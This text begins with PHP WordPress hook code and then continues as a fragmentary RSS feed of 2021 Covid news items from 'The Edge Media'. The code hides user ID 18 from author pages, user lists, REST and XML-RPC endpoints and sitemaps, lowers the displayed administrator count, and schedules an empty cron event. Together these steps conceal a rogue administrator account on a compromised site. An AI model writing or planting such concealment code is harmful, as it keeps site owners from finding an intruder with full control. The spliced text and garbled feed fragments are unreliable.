add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post In India, 33,376 new Covid cases have been reported, including 308 deaths appeared first on The Edge Media.
]]>With this increase, the total number of current Covid cases in the country has risen to 3,915,516. The number of active cases is 1.18 percent of the overall number of cases. The current weekly positivity rate is 2.26 percent, and it has been less than 3% for the past 78 days. The daily positivity rate, which is currently at 2.10 percent, has been below 3% for the past 12 days.
The post In India, 33,376 new Covid cases have been reported, including 308 deaths appeared first on The Edge Media.
]]>The post Covid-19: From Monday, The Delhi Government will Lift the 8 p.m. Market Limit appeared first on The Edge Media.
]]>Due to Covid-19, markets in Delhi were allowed to operate until 8 p.m., according to a translation of Kejriwal’s Hindi tweet. Due to a decrease in cases, this limitation will be lifted on Monday. Markets can now open at their regular times.
After a lockdown was established on April 19 because of a spike in cases during the second Covid-19 wave, several markets were blocked in the national capital. Later, with proper adherence to Covid-appropriate behavior and official rules, one weekly market in each municipal zone was authorized to open.
The post Covid-19: From Monday, The Delhi Government will Lift the 8 p.m. Market Limit appeared first on The Edge Media.
]]>The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.
]]>Across the country, 3,14,11,924 people have recovered, with 35,909 persons recuperating in the last 24 hours. The recovery rate is currently at 97.48 percent, the highest since March 2020, according to the health ministry.
According to the most recent figures, 54.58 crore vaccine doses have been distributed across the country, with 1743114 doses administered in the last 24 hours.
The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.
]]>The post Lockdown will be back if Covid cases rise, says Maharashtra CM Uddhav Thackeray appeared first on The Edge Media.
]]>He urged people to sign the commitment to rid the state and country of Covid-19. Thackeray also warned that if the state’s daily cases increased, there would be no choice but to enforce a lockdown. Thackeray was addressing at Mantralaya at the flag-hoisting ritual commemorating Independence Day.
In the context of Covid-19, Thackeray stated that the state has been experiencing pre-independence conditions for the past one and a half years as a result of Covid.
The post Lockdown will be back if Covid cases rise, says Maharashtra CM Uddhav Thackeray appeared first on The Edge Media.
]]>The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.
]]>55 of 60 cases reported this time were found to have a consistent causal association to vaccination . Of these , 36 were anxiety-related reactions and 18 were product-related , while one was categorised as both.
The National Adverse Events following Immunization (AEFI) Committee , which conducts causality assessment of AEFIs for COVID-19 , completed its assessment on May 27.
It has submitted its report to the Union Health Ministry.
The AEFIs June report included one death of a fully vaccinated person. It was labelled “Vaccine product-related reaction” or anaphylaxis.
The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.
]]>The post “Killing people with misinformation on covid19 vaccine” via social media platform , says Biden. appeared first on The Edge Media.
]]>On Thursday, Dr.Murthy, U.S Surgeon General Vivek Murthy said misinformation about the Covid-19, deemed an “infodemic” by the world health organisation, was deadly.
Mr.Biden’s comment came a day after Dr.murthy declared misinformation about the vaccine is a threat to public health.
“Misinformation poses an imminent and insidious threat to our nation’s health,” Dr.Murthy said during remarks at the White House.
Mr.Biden, asked if he had a message for a platform like Facebook where false or misleading information about the coronavirus has spread, told reporters, “they are killing people.” “The only pandemic we have is among the unvaccinated,” he said.
The post “Killing people with misinformation on covid19 vaccine” via social media platform , says Biden. appeared first on The Edge Media.
]]>The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.
]]>The move takes the total vaccines gifted by China to Sri Lanka to 2.7 million doses. Additionally , Srilanka has procured 6 million from china so far.
Another 2 million procured doses are scheduled to arrive during the third week of July, while Colomba plans to purchase a further two million in the last week of July, a spokesman of chinese Embassy said.
The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.
]]>The post Eiffel Tower to reopen after Record 9-month closure due to covid. appeared first on The Edge Media.
]]>The lifts of the “Iron Lady” are set to whir back into life,transporting tourists to its 300-meter (1000-foot) summit, ending a long period of inactivity caused by the Covid-19 pandemic.
Daily capacity is set to be restricted to 13,000 people, however, about half of the normal level, in order to respect social distance .
And from Wednesday next week, visitors will need to show proof of vaccination or a negative test, in line with recent government-imposed requirements.
The post Eiffel Tower to reopen after Record 9-month closure due to covid. appeared first on The Edge Media.
]]>The post Highest Number of Unvaccinated, under-vaccinated kids in India : UNICEF. appeared first on The Edge Media.
]]>It also noted that over 3 million of “Zero-dose children” in 2020 lived in India.
At nearly 4.4 million, South Asia recorded the highest number of children having failed to receive any routine vaccination in the past ten years, in 2020.
“More than 3 million of these “Zero-dose children” in 2020 lived in India,” the United Nations Children ‘s Emergency Fund, (UNICEF) said in a statement.
Globally, UNICEF said the data shows that just 10 countries account for 62 per cent of all under- or unvaccinated children globally.
The post Highest Number of Unvaccinated, under-vaccinated kids in India : UNICEF. appeared first on The Edge Media.
]]>The post PM Narendra Modi in Varanasi : Vikasvaad runs UP govt, not corruption or ‘Bhai-bhatijawad’ , says PM Modi. appeared first on The Edge Media.
]]>PM Modi also lauded the law and order situation in the state.
“The government in Uttar Pradesh is not ruled by corruption or ‘bhai bhatija vaad’, but by ‘vikasvaad’ (development),” PM Modi said.
Before inaugurating the convention centre, PM Modi addressed a crowd in Varanasi on Thursday. During his speech, PM Modi lauded Uttar Pradesh Chief Minister Yogi Adityanath for successfully handling the second wave of Covid-19.
The post PM Narendra Modi in Varanasi : Vikasvaad runs UP govt, not corruption or ‘Bhai-bhatijawad’ , says PM Modi. appeared first on The Edge Media.
]]>